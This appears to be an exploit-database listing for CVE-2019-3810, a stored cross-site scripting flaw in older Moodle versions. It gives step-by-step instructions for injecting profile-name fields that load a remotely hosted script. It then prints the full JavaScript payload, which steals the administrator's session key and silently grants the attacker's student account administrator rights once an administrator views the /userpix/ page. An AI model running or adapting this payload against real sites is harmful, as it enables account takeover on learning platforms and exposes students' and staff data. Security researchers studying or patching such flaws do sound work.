Share
## https://sploitus.com/exploit?id=PACKETSTORM:162399
# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)  
# Date: 04/2021  
# Exploit Author: farisv  
# Vendor Homepage: https://moodle.org/  
# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip  
# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16  
# CVE: CVE-2019-3810  
  
Moodle is a learning platform designed to provide educators, administrators,  
and learners with a single robust, secure and integrated system to create  
personalised learning environments.  
  
The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for  
privilege escalation from student to administrator.  
  
1. Upload the XSS payload [1] to pastebin or other similar service.  
Change the value of userid to your own id.  
Let's say the URL is https://pastebin.com/raw/xxxxxxxx.  
2. Login to your student account.  
3. Set first name with:  
" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement  
4. Set surname with:  
('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')  
5. Ask the administrator to open /userpix/ page or put the link to that page  
on your post and wait.  
  
If successful, your account will be added as administrator.  
  
See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810  
  
[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.  
  
var webroot = '/';  
var userid = '3';  
var sesskey = '';  
  
function get(path, success) {  
var xhr = new XMLHttpRequest();  
xhr.open('GET', webroot + path);  
xhr.onreadystatechange = function() {  
if (xhr.readyState > 3 && xhr.status == 200) {  
success(xhr.responseText);  
}  
};  
xhr.send();  
return xhr;  
}  
  
function post(path, data, success) {  
var xhr = new XMLHttpRequest();  
xhr.open('POST', webroot + path);  
xhr.onreadystatechange = function() {  
if (xhr.readyState > 3 && xhr.status == 200) {  
success(xhr.responseText);  
}  
};  
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');  
xhr.send(encodeURI(data));  
return xhr;  
}  
  
function setAdmin() {  
// Assign administrator access to userid  
bpath = 'admin/roles/admins.php';  
data = "confirmadd=" + userid + "&sesskey=" + sesskey;  
post(bpath, data, function(data){});  
}  
  
function getSesskey(data) {  
var sesskey_find = data.indexOf('"sesskey":"');  
sesskey = data.substr(sesskey_find + 11, 10);  
setAdmin();  
}  
  
function payload() {  
// We can find Sesskey inside JS script in main page  
get('', getSesskey);  
}  
  
// Start  
payload();